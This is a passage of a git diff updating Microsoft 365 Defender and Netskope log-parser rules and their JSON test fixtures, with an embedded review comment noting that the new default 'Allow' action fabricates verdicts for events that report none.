"{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + 
"DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json index f2ac938fb..122a2bc61 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json 
@@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "action": "Moved to quarantine", "category": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json index de75ec66d..0948ffe48 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json 
@@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", 
\"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": 
\"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "iam" diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 3a5d48cd4..2f5082094 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json 
@@ -55,30 +55,36 @@
 "-F",
 "smtpd_tls_protocols\\commandtest"
 ],
- "code_signature": {
- "status": "Unknown",
- "subject_name": "Unknown"
- },
 "command_line": "grep -F smtpd_tls_protocols\\commandtest",
- "executable": "/usr/test/platform-python3.6",
- "hash": {
- "md5": "eeeee2999444ddaaaaa08598b06eafe7",
- "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
- "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
- },
- "name": "platform-python3.6",
+ "name": "grep",
 "parent": {
+ "args": [
+ "--register",
+ "/usr/lib/python3.6/run.py"
+ ],
+ "code_signature": {
+ "status": "Unknown",
+ "subject_name": "Unknown"
+ },
+ "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+ "executable": "/usr/test/platform-python3.6",
+ "hash": {
+ "md5": "eeeee2999444ddaaaaa08598b06eafe7",
+ "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
+ "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
+ },
 "name": "platform-python3.6",
- "pid": 408229,
- "start": "2024-09-24T14:17:34.790000Z"
+ "pid": 408996,
+ "start": "2024-09-24T14:18:11.850000Z",
+ "user": {
+ "domain": "testdomain",
+ "name": "testaccount"
+ },
+ "working_directory": "/usr/test"
 },
 "pid": 408996,
 "start": "2024-09-24T14:18:11.864114Z",
- "user": {
- "domain": "testdomain",
- "name": "testaccount"
- },
- "working_directory": "/usr/test"
+ "working_directory": "/usr/bin"
 },
 "related": {
 "hash": [
diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml
index 1c33c07bc..b4606f079 100644
--- a/Netskope/netskope_events/ingest/parser.yml
+++ b/Netskope/netskope_events/ingest/parser.yml
@@ -37,6 +37,7 @@ stages:
 observer.vendor: "Netskope"
 event.dataset: "{{parsed_event.message.type}}"
 event.action: "{{parsed_event.message.activity}}"
+ action.name: "{{parsed_event.message.action or 'Allow'}}"
 event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}"
 event.duration: "{{parsed_event.message.conn_duration}}"
 user_agent.original: "{{parsed_event.message.user_agent}}"
@@ -92,6 +93,9 @@ stages:
 - set:
 file.path: "{{parsed_event.message.file_path}}"
 filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}'
+ - set:
+ file.size: "{{parsed_event.message.file_size}}"
+ filter: "{{parsed_event.message.file_size not in [None, 0]}}"
 - translate:
 dictionary:
 "yes": "alert"
diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
index 67944d71d..c564471d7 100644
--- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
+++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
@@ -16,6 +16,9 @@
 ]
 },
 "@timestamp": "2022-05-02T00:29:01Z",
+ "action": {
+ "name": "Allow"
+ },
 "netskope": {
 "events": {
 "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
index 79f08033a..952e5c0b6 100644
--- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
+++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
@@ -16,6 +16,9 @@
 ]
 },
 "@timestamp": "2022-05-02T11:09:47Z",
+ "action": {
+ "name": "Allow"
+ },
 "netskope": {
 "events": {
 "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json
index 8a05a5c15..05b0456e2 100644
--- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json
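Review bot: `action.name: "{{parsed_event.message.action or 'Allow'}}"` invents an `Allow` verdict whenever the source omits or blanks `action`, so audit events such as the login-failure fixture updated below (test_audit_log_login_failed.json) and the new upload fixture whose raw event carries `"action":""` all end up asserting `action.name: Allow` although Netskope reported no decision. A rule that pivots on `action.name` to separate blocked from allowed traffic will then treat every unverdicted event as allowed. Setting the field only when present, as the file already does for `file.path`, avoids the fabricated value: `- set:` / `action.name: "{{parsed_event.message.action}}"` / `filter: '{{parsed_event.message.action not in [None, ""]}}'`. In the second hunk, `file.size` is skipped when the source reports `0`, which also hides genuine zero-byte files; if the intent is to drop Netskope's not-applicable default, a comment saying so (`# Netskope sends file_size 0 when no file is involved`) would help the next reader.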
+++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json
@@ -16,6 +16,9 @@
 ]
 },
 "@timestamp": "2022-05-02T12:20:31Z",
+ "action": {
+ "name": "Allow"
+ },
 "netskope": {
 "events": {
 "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json
index 1b4d67977..cf808efde 100644
--- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json
+++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json
@@ -16,6 +16,9 @@
 ]
 },
 "@timestamp": "2022-12-22T16:38:07Z",
+ "action": {
+ "name": "Allow"
+ },
 "netskope": {
 "events": {
 "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json
index 8b4635920..fb06271d6 100644
--- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json
+++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json
@@ -16,6 +16,9 @@
 ]
 },
 "@timestamp": "2022-12-07T10:46:07Z",
+ "action": {
+ "name": "Allow"
+ },
 "netskope": {
 "events": {
 "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json
index b06db05ac..667c5755e 100644
--- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json
+++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json
@@ -16,6 +16,9 @@
 ]
 },
 "@timestamp": "2022-05-02T11:09:47Z",
+ "action": {
+ "name": "Allow"
+ },
 "netskope": {
 "events": {
 "action": {
diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json
index 29f3c0723..996cd6263 100644
--- a/Netskope/netskope_events/tests/test_connection_log.json
+++ b/Netskope/netskope_events/tests/test_connection_log.json
@@ -19,6 +19,9 @@
 ]
 },
 "@timestamp": "2022-12-21T16:12:20Z",
+ "action": {
+ "name": "Allow"
+ },
 "destination": {
 "address": "5.6.7.8",
 "bytes": 0,
diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json
index 66c901c90..b3cb772d3 100644
--- a/Netskope/netskope_events/tests/test_dlp_incident.json
+++ b/Netskope/netskope_events/tests/test_dlp_incident.json
@@ -16,6 +16,9 @@
 ]
 },
 "@timestamp": "2023-01-31T08:11:53Z",
+ "action": {
+ "name": "Allow"
+ },
 "cloud": {
 "instance": {
 "id": "example.org"
@@ -30,7 +33,8 @@
 "hash": {
 "md5": "68b329da9893e34099c7d8ad5cb9c940"
 },
- "mime_type": "eicar.txt"
+ "mime_type": "eicar.txt",
+ "size": 19154
 },
 "http": {
 "request": {
diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json
index 63497504d..e1a0a66c5 100644
--- a/Netskope/netskope_events/tests/test_malware_alert.json
+++ b/Netskope/netskope_events/tests/test_malware_alert.json
@@ -17,6 +17,9 @@
 ]
 },
 "@timestamp": "2022-12-21T14:12:08Z",
+ "action": {
+ "name": "Detection"
+ },
 "destination": {
 "address": "5.6.7.8",
 "bytes": 0,
@@ -36,7 +39,8 @@
 "hash": {
 "md5": "68b329da9893e34099c7d8ad5cb9c940"
 },
- "name": "eicarcom2.zip"
+ "name": "eicarcom2.zip",
+ "size": 308
 },
 "host": {
 "name": "MacBook Pro",
diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json
new file mode 100644
index 000000000..404b5d4ab
--- /dev/null
+++ b/Netskope/netskope_events/tests/test_nspolicy_block.json
@@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\"
:0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 
13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_t
ype\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "event": { + "action": "Browse", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:01:32Z", + "action": { + "name": "block" + }, + "destination": { + "address": 